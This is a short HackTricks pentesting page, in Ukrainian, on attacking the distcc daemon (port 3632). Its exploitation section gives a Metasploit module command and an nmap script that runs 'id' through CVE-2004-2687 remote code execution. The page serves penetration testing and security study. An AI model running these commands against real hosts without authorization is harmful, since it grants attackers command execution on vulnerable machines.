tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Основна інформація
Distcc - це інструмент, який покращує процес компіляції, використовуючи вільну обчислювальну потужність інших комп'ютерів у мережі. Коли distcc налаштовано на машині, ця машина здатна розподіляти свої задачі компіляції на іншу систему. Ця система-отримувач повинна працювати з distccd daemon і мати встановлений сумісний компілятор для обробки надісланого коду.
Порт за замовчуванням: 3632
PORT STATE SERVICE
3632/tcp open distccd
Експлуатація
Перевірте, чи вразливий до CVE-2004-2687 для виконання довільного коду:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Я не думаю, що shodan виявляє цей сервіс.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.